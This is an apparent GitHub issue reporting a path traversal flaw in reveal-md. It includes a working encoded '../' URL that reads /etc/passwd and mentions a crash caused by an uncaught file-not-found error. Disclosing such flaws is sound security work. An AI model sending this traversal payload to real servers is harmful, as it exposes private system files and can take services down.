Arbitrary file read leads access to all local files
W0rty opened this issue · comments
W0rty commented
Run an instance of reveal-md (from source code or docker hub), and then reach the following URL :
http://localhost:1948/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc.md%2F..%2Fetc%2Fpasswd
This will leak /etc/passwd of local machine (or docker)
Moreover, if we try to reach a non-existent file, the server will crash because there is no catch for the exception "ENOENT" (no such file or directory).